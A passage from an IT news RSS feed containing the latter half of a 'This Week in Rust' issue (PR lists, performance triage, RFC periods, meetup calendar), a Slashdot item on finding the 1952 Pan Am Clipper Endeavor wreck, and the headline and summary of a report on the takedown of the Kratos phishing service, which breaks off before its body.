<li><a href="https://github.com/rust-lang/rust/pull/158545">move <code>std::io::read_to_string</code> to <code>alloc::io</code></a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cargo">Cargo</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/159149">use PGO for Cargo</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17238"><code>timings</code>: only report units the job queue actually ran</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17236">do not include proc-macro deps in rustc search path args</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17216">include SBOM outputs in fingerprints</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17226">lazily initialize git2 fetch transports</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rustdoc">Rustdoc</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/159194">fix auto trait normalization env</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/159091">use PGO for rustdoc</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#clippy">Clippy</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16855">add <code>block_scrutinee</code> lint</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17415">avoid invalid <code>ref_as_ptr</code> suggestions in const/static initializers</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16800">detect <code>== 0</code> on unsigned types as a <code>manual_clamp</code> lower bound</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17405">fix <code>if_not_else</code> linting on macro expanded conditions</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17383">fix <code>needless_collect</code> suggests a suggestion that cannot be typed</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17385"><code>non_zero_suggestions</code>: don't lint signed integer div/rem as NonZero</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17377"><code>manual_filter</code>: don't eat comments in the <code>and_then</code> suggestion</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17369">require the use of <code>as _</code> for indirectly used traits in clippy sources</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17362">rewrite <code>min_ident_chars</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16633">use <code>#[must_use]</code> determination from the compiler</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-analyzer">Rust-Analyzer</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22634">avoid index panic when flycheck list is empty</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22811">add capture hints to coroutines</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22813">add handler for E0572</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22483">do not assume array destructuring assignments with rest pattern are constant-sized</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22852">eagerly normalize <code>.await</code>'s <code>IntoFuture::Output</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22791">enable auto trait inference</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22792">extract variable preserving whitespace from macro input</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22832">fix coroutines not recording binding owners correctly</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22759">fix crashes in assists due to <code>.unwrap()</code> calls in SyntaxFactory</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22810">fix <code>hir</code> crate leaking bound variables from skipped binders</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22855">fix <code>InferenceContext:identity_args</code> using the wrong DefId</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22849">fix syntax bridge panic when spilting float</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22857">handle <code>enum</code> variants in next-solver <code>generics</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22818">implement lowering of HRTB</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22789">invalid <code>pattern_matching_variant</code> lowering due to recovery</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22867">merge <code>WherePredicate::ForLifetimes</code> into <code>WherePredicate::TypeBound</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22804">only write anon const ty in parent's inference result if it doesn't have its own inference</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22822">panic with a function item and a proc macro item having a duplicate name</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22827">parser to error on macro type bound</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22865">spawn proc-macro servers on requests clearing the client cache</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22782">use quote! inside <code>ast::make::expr_call()</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22793">use <code>Result</code> for the lsp-server <code>Response</code> payload type</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22861">record expressions in types in <code>ExprScope</code></a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-compiler-performance-triage">Rust Compiler Performance Triage</a></h5>
<p>The two most notable changes this week were <a href="https://github.com/rust-lang/rust/pull/159115">#159115</a>,
which resulted in pretty nice instruction count wins for full incremental builds on several benchmarks,
and <a href="https://github.com/rust-lang/rust/pull/159091">#159091</a>, which enabled PGO for rustdoc, which
makes it ~3-4% faster across the board.</p>
<p>There were two large rollups with tiny performance regressions, which made it difficult to find
the offending PRs.</p>
<p>Triage done by <strong>@Kobzol</strong>.
Revision range: <a href="https://perf.rust-lang.org/?start=5503df87342a73d0c29126a7e08dc9c1255c46ad&amp;end=d527bc9bfa297ca7fd7f5ae93781eeec42073170&amp;absolute=false&amp;stat=instructions%3Au">5503df87..d527bc9b</a></p>
<p><strong>Summary</strong>:</p>
<table>
<thead>
<tr>
<th>(instructions:u)</th>
<th>mean</th>
<th>range</th>
<th>count</th>
</tr>
</thead>
<tbody>
<tr>
<td>Regressions ❌ <br> (primary)</td>
<td>0.4%</td>
<td>[0.2%, 1.0%]</td>
<td>40</td>
</tr>
<tr>
<td>Regressions ❌ <br> (secondary)</td>
<td>0.7%</td>
<td>[0.2%, 4.6%]</td>
<td>69</td>
</tr>
<tr>
<td>Improvements ✅ <br> (primary)</td>
<td>-2.0%</td>
<td>[-6.2%, -0.2%]</td>
<td>136</td>
</tr>
<tr>
<td>Improvements ✅ <br> (secondary)</td>
<td>-2.6%</td>
<td>[-8.4%, -0.2%]</td>
<td>119</td>
</tr>
<tr>
<td>All ❌✅ (primary)</td>
<td>-1.4%</td>
<td>[-6.2%, 1.0%]</td>
<td>176</td>
</tr>
</tbody>
</table>
<p>2 Regressions, 3 Improvements, 6 Mixed; 4 of them in rollups
34 artifact comparisons made in total</p>
<p><a href="https://github.com/rust-lang/rustc-perf/blob/189822607d8d09acd85c234b2c245e817591ca67/triage/2026/2026-07-21.md">Full report here</a>.</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#approved-rfcs"></a><a href="https://github.com/rust-lang/rfcs/commits/master">Approved RFCs</a></h5>
<p>Changes to Rust follow the Rust <a href="https://github.com/rust-lang/rfcs#rust-rfcs">RFC (request for comments) process</a>. These
are the RFCs that were approved for implementation this week:</p>
<ul>
<li><em>No RFCs were approved this week.</em></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#final-comment-period">Final Comment Period</a></h5>
<p>Every week, <a href="https://www.rust-lang.org/team.html">the team</a> announces the 'final comment period' for RFCs and key PRs
which are reaching a decision. Express your opinions now.</p>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#tracking-issues-prs">Tracking Issues &amp; PRs</a></h6>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust"></a><a href="https://github.com/rust-lang/rust/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Rust</a>
<ul>
<li><a href="https://github.com/rust-lang/rust/issues/159298">Tracking Issue for <code>bool::toggle</code></a></li>
<li><a href="https://github.com/rust-lang/rust/issues/146954">Tracking Issue for vec_try_remove</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157562">Avoid computing layout of enums with non-int discriminants</a></li>
<li><a href="https://github.com/rust-lang/rust/issues/71835">Tracking Issue for const_btree_len</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/138230">Add <code>raw_borrows_via_references</code> lint</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157572">stabilize size_of_val_raw, align_of_val_raw, Layout::for_value_raw</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158835">rustc_passes: lint unused <code>#[path]</code> attributes on inline modules</a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#compiler-team-mcps-only"></a><a href="https://github.com/rust-lang/compiler-team/issues?q=label%3Amajor-change%20label%3Afinal-comment-period%20state%3Aopen">Compiler Team</a> <a href="https://forge.rust-lang.org/compiler/mcp.html">(MCPs only)</a>
<ul>
<li><a href="https://github.com/rust-lang/compiler-team/issues/1019">Emit <code>note</code> when calling <code>rustc</code> without specifying an edition</a></li>
<li><a href="https://github.com/rust-lang/compiler-team/issues/1011">Let the OS handle stack growth</a></li>
<li><a href="https://github.com/rust-lang/compiler-team/issues/1010">Add <code>target_feature_available_at_call_site</code></a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#leadership-council"></a><a href="https://github.com/rust-lang/leadership-council/issues?q=state%3Aopen%20label%3Afinal-comment-period%20state%3Aopen">Leadership Council</a>
<ul>
<li><a href="https://github.com/rust-lang/leadership-council/pull/314">Deallocate post-2026 funds from PM and compiler-ops</a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#unsafe-code-guidelines"></a><a href="https://github.com/rust-lang/unsafe-code-guidelines/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Unsafe Code Guidelines</a>
<ul>
<li><a href="https://github.com/rust-lang/unsafe-code-guidelines/issues/558">Do the bytes of a pointer have to stay in the same order?</a></li>
</ul>
<p><em>No Items entered Final Comment Period this week for
  <a href="https://github.com/rust-lang/cargo/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Cargo</a>,
  <a href="https://github.com/rust-lang/reference/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Language Reference</a>,
  <a href="https://github.com/rust-lang/lang-team/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Language Team</a> or
  <a href="https://github.com/rust-lang/rfcs/issues?q=state%3Aopen%20label%3Afinal-comment-period%20state%3Aopen">Rust RFCs</a>.</em></p>
<p>Let us know if you would like your PRs, Tracking Issues or RFCs to be tracked as a part of this list.</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#new-and-updated-rfcs"></a><a href="https://github.com/rust-lang/rfcs/pulls">New and Updated RFCs</a></h5>
<ul>
<li><a href="https://github.com/rust-lang/rfcs/pull/3984">RFC: Refactor the libs team</a></li>
</ul>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#upcoming-events">Upcoming Events</a></h4>
<p>Rusty Events between 2026-07-22 - 2026-08-19 🦀</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#virtual">Virtual</a></h5>
<ul>
<li>2026-07-24 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a><ul>
<li><a href="https://luma.com/hd8mlw56"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
</ul>
</li>
<li>2026-07-28 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/310254777/"><strong>Fourth Tuesday</strong></a></li>
</ul>
</li>
<li>2026-07-28 | Virtual (Washington, DC, US) | <a href="https://www.meetup.com/rustdc">Rust DC</a><ul>
<li><a href="https://www.meetup.com/rustdc/events/315279653/"><strong>Mid-month Rustful</strong></a></li>
</ul>
</li>
<li>2026-07-30 | Virtual (Berlin, DE) | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/312045928/"><strong>Rust Hack and Learn</strong></a></li>
</ul>
</li>
<li>2026-07-31 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a><ul>
<li><a href="https://luma.com/uo5ek1f4"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
</ul>
</li>
<li>2026-08-01 | Virtual (Kampala, UG) | <a href="https://www.eventbrite.com/e/rust-circle-meetup-tickets-628763176587">Rust Circle Meetup</a><ul>
<li><a href="https://www.eventbrite.com/e/rust-circle-meetup-tickets-628763176587"><strong>Rust Circle Meetup</strong></a></li>
</ul>
</li>
<li>2026-08-02 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/314095294/"><strong>Rust Deep Learning: First Sunday</strong></a></li>
</ul>
</li>
<li>2026-08-04 | Virtual (London, UK) | <a href="https://www.meetup.com/women-in-rust">Women in Rust</a><ul>
<li><a href="https://www.meetup.com/women-in-rust/events/315213885/"><strong>👋 Community Catch Up</strong></a></li>
</ul>
</li>
<li>2026-08-05 | Virtual (Indianapolis, IN, US) | <a href="https://www.meetup.com/indyrs">Indy Rust</a><ul>
<li><a href="https://www.meetup.com/indyrs/events/315210367/"><strong>Indy.rs - with Social Distancing</strong></a></li>
</ul>
</li>
<li>2026-08-07 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a><ul>
<li><a href="https://luma.com/ii2jrwva"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
</ul>
</li>
<li>2026-08-11 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/310254776/"><strong>Second Tuesday</strong></a></li>
</ul>
</li>
<li>2026-08-13 | Virtual (Berlin, DE) | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/313345333/"><strong>Rust Hack and Learn</strong></a></li>
</ul>
</li>
<li>2026-08-13 | Virtual (Nürnberg, DE) | <a href="https://www.meetup.com/rust-noris">Rust Nuremberg</a><ul>
<li><a href="https://www.meetup.com/rust-noris/events/315619609/"><strong>Rust Nürnberg online</strong></a></li>
</ul>
</li>
<li>2026-08-14 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a><ul>
<li><a href="https://luma.com/f2hnzrug"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
</ul>
</li>
<li>2026-08-18 | Virtual (Washington, DC, US) | <a href="https://www.meetup.com/rustdc">Rust DC</a><ul>
<li><a href="https://www.meetup.com/rustdc/events/315604176/"><strong>Mid-month Rustful</strong></a></li>
</ul>
</li>
<li>2026-08-19 | Hybrid (Vancouver, BC, CA) | <a href="https://www.meetup.com/vancouver-rust">Vancouver Rust</a><ul>
<li><a href="https://www.meetup.com/vancouver-rust/events/314105333/"><strong>Dealing with Dependencies</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#africa">Africa</a></h5>
<ul>
<li>2026-08-11 | Johannesburg, ZA | <a href="https://www.meetup.com/johannesburg-rust-meetup">Johannesburg Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/johannesburg-rust-meetup/events/315750593/"><strong>Rust's extended standard library</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#asia">Asia</a></h5>
<ul>
<li>2026-07-25 | Mumbai, IN | <a href="https://luma.com/mumbai">Rust Mumbai</a><ul>
<li><a href="https://luma.com/7ksabwbm/"><strong>​Rust Mumbai — July Meetup 🦀</strong></a></li>
</ul>
</li>
<li>2026-07-26 | Pune, IN | <a href="https://www.meetup.com/rust-pune">Rust Pune</a><ul>
<li><a href="https://www.meetup.com/rust-pune/events/315651505/"><strong>Rust Pune: July 2026</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#europe">Europe</a></h5>
<ul>
<li>2026-07-23 | Berlin, DE | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/315484101/"><strong>Rust Berlin Talks: The next generation</strong></a></li>
</ul>
</li>
<li>2026-07-23 | London, UK | <a href="https://www.meetup.com/rust-london-user-group">Rust London User Group</a><ul>
<li><a href="https://www.meetup.com/rust-london-user-group/events/315612916/"><strong>LDN Talks: July 2026 Antithesis Takeover</strong></a></li>
</ul>
</li>
<li>2026-07-23 | London, UK | <a href="https://www.meetup.com/london-rust-project-group">London Rust Project Group</a><ul>
<li><a href="https://www.meetup.com/london-rust-project-group/events/315366453/"><strong>Rama modular service framework for Rust</strong></a></li>
</ul>
</li>
<li>2026-07-23 | Paris, FR | <a href="https://www.meetup.com/rust-paris">Rust Paris</a><ul>
<li><a href="https://www.meetup.com/rust-paris/events/315309633/"><strong>Rust meetup #87</strong></a></li>
</ul>
</li>
<li>2026-07-25 | Stockholm, SE | <a href="https://www.meetup.com/stockholm-rust">Stockholm Rust</a><ul>
<li><a href="https://www.meetup.com/stockholm-rust/events/315749994/"><strong>Ferris' Fika Forum #28</strong></a></li>
</ul>
</li>
<li>2026-07-27 | Augsburg, DE | <a href="https://rust-augsburg.github.io/meetup">Rust Meetup Augsburg</a><ul>
<li><a href="https://rust-augsburg.github.io/meetup/Meetup_20.html"><strong>Rust Meetup #20: Julian Dickert - Supply chain security in Rust: Evaluating crates for production</strong></a></li>
</ul>
</li>
<li>2026-07-29 | Poland, PL | <a href="https://www.meetup.com/rust-poland-meetup">Rust Poland</a><ul>
<li><a href="https://www.meetup.com/rust-poland-meetup/events/315582674/"><strong>Rust Poland x Kraków #10</strong></a></li>
</ul>
</li>
<li>2026-07-30 | Copenhagen, DK | <a href="https://www.meetup.com/copenhagen-rust-community">Copenhagen Rust Community</a><ul>
<li><a href="https://www.meetup.com/copenhagen-rust-community/events/315767999/"><strong>Rust meetup #70</strong></a></li>
</ul>
</li>
<li>2026-07-30 | Manchester, UK | <a href="https://www.meetup.com/rust-manchester">Rust Manchester</a><ul>
<li><a href="https://www.meetup.com/rust-manchester/events/315037685/"><strong>Rust Manchester July Code Night</strong></a></li>
</ul>
</li>
<li>2026-08-18 | Aarhus, DK | <a href="https://www.meetup.com/rust-aarhus">Rust Aarhus</a><ul>
<li><a href="https://www.meetup.com/rust-aarhus/events/315683629/"><strong>Hack Night: Trust but verify the LLM</strong></a></li>
</ul>
</li>
<li>2026-08-18 | Leipzig, DE | <a href="https://www.meetup.com/rust-modern-systems-programming-in-leipzig">Rust - Modern Systems Programming in Leipzig</a><ul>
<li><a href="https://www.meetup.com/rust-modern-systems-programming-in-leipzig/events/313816474/"><strong>Topic TBD</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#north-america">North America</a></h5>
<ul>
<li>2026-07-22 | Austin, TX, US | <a href="https://www.meetup.com/rust-atx">Rust ATX</a><ul>
<li><a href="https://www.meetup.com/rust-atx/events/xvkdgtyjckbdc/"><strong>Rust Lunch - Fareground</strong></a></li>
</ul>
</li>
<li>2026-07-22 | Los Angeles, CA, US | <a href="https://www.meetup.com/rust-los-angeles">Rust Los Angeles</a><ul>
<li><a href="https://www.meetup.com/rust-los-angeles/events/315376271/"><strong>Rust LA: Rust in Distributed Systems with Flight Science!</strong></a></li>
</ul>
</li>
<li>2026-07-22 | New York, NY, US | <a href="https://www.meetup.com/rust-nyc/events/">Rust NYC</a><ul>
<li><a href="https://www.meetup.com/rust-nyc/events/315636854/"><strong>Rust NYC: Write A Custom Coding Agent and wasm_zero</strong></a></li>
</ul>
</li>
<li>2026-07-23 | Mountain View, CA, US | <a href="https://www.meetup.com/hackerdojo/events/">Hacker Dojo</a><ul>
<li><a href="https://www.meetup.com/hackerdojo/events/315418155/"><strong>RUST MEETUP at HACKER DOJO</strong></a></li>
</ul>
</li>
<li>2026-07-25 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/315582650/"><strong>Porter Square Rust Lunch, July 25</strong></a></li>
</ul>
</li>
<li>2026-07-25 | Brooklyn, NY, US | <a href="https://flowercomputer.com/">Flower</a><ul>
<li><a href="https://partiful.com/e/Vq9fyDNCMSO7ia4ulK5b"><strong>BOG-A-THON 2</strong></a></li>
</ul>
</li>
<li>2026-07-30 | Atlanta, GA, US | <a href="https://www.meetup.com/rust-atl">Rust Atlanta</a><ul>
<li><a href="https://www.meetup.com/rust-atl/events/313539329/"><strong>Rust-Atl</strong></a></li>
</ul>
</li>
<li>2026-08-01 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/315582653/"><strong>Chinatown Rust Lunch, Aug 1</strong></a></li>
</ul>
</li>
<li>2026-08-04 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/314660176/"><strong>Evening Boston Rust Meetup at Red Hat, Aug 4</strong></a></li>
</ul>
</li>
<li>2026-08-06 | Saint Louis, MO, US | <a href="https://www.meetup.com/stl-rust">STL Rust</a><ul>
<li><a href="https://www.meetup.com/stl-rust/events/314701905/"><strong>Shipping Temporal: How a Global Rust Ecosystem Built Chrome’s Newest Web API</strong></a></li>
</ul>
</li>
<li>2026-08-13 | Lehi, UT, US | <a href="https://www.meetup.com/utah-rust">Utah Rust</a><ul>
<li><a href="https://www.meetup.com/utah-rust/events/314696652/"><strong>Utah Rust August Meetup</strong></a></li>
</ul>
</li>
<li>2026-08-13 | San Diego, CA, US | <a href="https://www.meetup.com/san-diego-rust">San Diego Rust</a><ul>
<li><a href="https://www.meetup.com/san-diego-rust/events/315601099/"><strong>San Diego Rust August Meetup - Back in person!</strong></a></li>
</ul>
</li>
<li>2026-08-15 | San Francisco, CA, US | <a href="https://flowercomputer.com/">Flower</a><ul>
<li><a href="https://partiful.com/e/juWAwRs3XMWP7s9wLNWK"><strong>BOG-A-THON 3</strong></a></li>
</ul>
</li>
<li>2026-08-18 | San Francisco, CA, US | <a href="https://www.meetup.com/san-francisco-rust-study-group">San Francisco Rust Study Group</a><ul>
<li><a href="https://www.meetup.com/san-francisco-rust-study-group/events/314997215/"><strong>Rust Hacking in Person</strong></a></li>
</ul>
</li>
<li>2026-08-19 | Hybrid (Vancouver, BC, CA) | <a href="https://www.meetup.com/vancouver-rust">Vancouver Rust</a><ul>
<li><a href="https://www.meetup.com/vancouver-rust/events/314105333/"><strong>Dealing with Dependencies</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#oceania">Oceania</a></h5>
<ul>
<li>2026-07-23 | Perth, AU | <a href="https://www.meetup.com/perth-rust-meetup-group">Rust Perth Meetup Group</a><ul>
<li><a href="https://www.meetup.com/perth-rust-meetup-group/events/315451138/"><strong>Rust Perth: July Meetup!</strong></a></li>
</ul>
</li>
<li>2026-07-30 | Melbourne, AU | <a href="https://www.meetup.com/rust-melbourne">Rust Melbourne</a><ul>
<li><a href="https://www.meetup.com/rust-melbourne/events/315039480/"><strong>Rust Melbourne July 2026</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#south-america">South America</a></h5>
<ul>
<li>2026-08-08 | São Paulo, SP | <a href="https://luma.com/calendar/cal-bif2oHITU1aVvsr">Rust-SP</a><ul>
<li><a href="https://luma.com/41oiyhtk"><strong>Rust SP - Aug/2026</strong></a></li>
</ul>
</li>
</ul>
<p>If you are running a Rust event please add it to the <a href="https://www.google.com/calendar/embed?src=apd9vmbc22egenmtu5l6c5jbfc%40group.calendar.google.com">calendar</a> to get
it mentioned here. Please remember to add a link to the event too.
Email the <a href="mailto:community-team@rust-lang.org">Rust Community Team</a> for access.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#jobs">Jobs</a></h4>
<p>Please see the latest <a href="https://www.reddit.com/r/rust/comments/1ttbtf5/official_rrust_whos_hiring_thread_for_jobseekers/">Who's Hiring thread on r/rust</a></p>
<h3><a class="toclink" href="https://this-week-in-rust.org/atom.xml#quote-of-the-week">Quote of the Week</a></h3>
<blockquote>
<p>We were planning on publishing a blog post announcing this at the same time as making the repo public, but ran out of private repo CI usage 😭.</p>
</blockquote>
<p>– <a href="https://www.reddit.com/r/rust/comments/1uzknzl/tokiorstopcoat_a_batteriesincluded_framework_for/oy8k2nn/">Carl Lerche on r/rust</a> about the launch of topcoat</p>
<p>Despite a lamentable lack of suggestions, llogiq is glad to have found this quote.</p>
<p><a href="https://users.rust-lang.org/t/twir-quote-of-the-week/328">Please submit quotes and vote for next week!</a></p>
<p>This Week in Rust is edited by:</p>
<ul>
<li><a href="https://github.com/nellshamrell">nellshamrell</a></li>
<li><a href="https://github.com/llogiq">llogiq</a></li>
<li><a href="https://github.com/ericseppanen">ericseppanen</a></li>
<li><a href="https://github.com/extrawurst">extrawurst</a></li>
<li><a href="https://github.com/U007D">U007D</a></li>
<li><a href="https://github.com/mariannegoldin">mariannegoldin</a></li>
<li><a href="https://github.com/bdillo">bdillo</a></li>
<li><a href="https://github.com/opeolluwa">opeolluwa</a></li>
<li><a href="https://github.com/bnchi">bnchi</a></li>
<li><a href="https://github.com/KannanPalani57">KannanPalani57</a></li>
<li><a href="https://github.com/tzilist">tzilist</a></li>
</ul>
<p><em>Email list hosting is sponsored by <a href="https://foundation.rust-lang.org/">The Rust Foundation</a></em></p>
<p><small><a href="https://www.reddit.com/r/rust/comments/1v41dgv/this_week_in_rust_661/">Discuss on r/rust</a></small></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Pan Am Plane Crash That Inspired Modern Safety Briefings Found After 74 Years]]></title>
<description><![CDATA[Longtime Slashdot reader BeaverCleaver shares a report from the BBC: The wreckage of a Pan American Airways plane has been found 74 years after it plunged into the Atlantic Ocean in a crash that prompted mandatory airline safety briefings. The Clipper Endeavor was found 2,000ft (610m) below sea l...]]></description>
<link>https://tsecurity.de/de/3687920/it-security-nachrichten/pan-am-plane-crash-that-inspired-modern-safety-briefings-found-after-74-years/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687920/it-security-nachrichten/pan-am-plane-crash-that-inspired-modern-safety-briefings-found-after-74-years/</guid>
<pubDate>Thu, 23 Jul 2026 05:44:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Longtime Slashdot reader BeaverCleaver shares a report from the BBC: The wreckage of a Pan American Airways plane has been found 74 years after it plunged into the Atlantic Ocean in a crash that prompted mandatory airline safety briefings. The Clipper Endeavor was found 2,000ft (610m) below sea level off the coast of Puerto Rico with a sonar-equipped drone. It went down on April 11, 1952, following multiple-engine failure shortly after take-off.
 
Everyone onboard survived the impact -- but passengers struggled to locate life vests and rafts as the plane rapidly sank. Of the 69 passengers and crew onboard, just 17 survived. The disaster led to sweeping reforms in aviation safety, including compulsory pre-flight safety briefings on every commercial flight. [...] Today, before every commercial flight, cabin crew are required to outline where a plane's exits are, as well as the location of life vests and how to inflate them.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Pan+Am+Plane+Crash+That+Inspired+Modern+Safety+Briefings+Found+After+74+Years%3A+https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F07%2F23%2F033235%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F07%2F23%2F033235%2Fpan-am-plane-crash-that-inspired-modern-safety-briefings-found-after-74-years%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://news.slashdot.org/story/26/07/23/033235/pan-am-plane-crash-that-inspired-modern-safety-briefings-found-after-74-years?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[German law enforcement claims to have ‘dismantled’ mega phishing-as-a-service group Kratos]]></title>
<description><![CDATA[A global law enforcement crackdown has seized infrastructure serving the massive phishing-as-a-service (PhaaS) group Kratos, as well resulting in the arrest of an unnamed Kratos “developer and technical administrator” in Indonesia. 



The effort was managed by German law enforcement and involved...]]></description>
<link>https://tsecurity.de/de/3687784/it-security-nachrichten/german-law-enforcement-claims-to-have-dismantled-mega-phishing-as-a-service-group-kratos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687784/it-security-nachrichten/german-law-enforcement-claims-to-have-dismantled-mega-phishing-as-a-service-group-kratos/</guid>
<pubDate>Thu, 23 Jul 2026 01:57:56 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
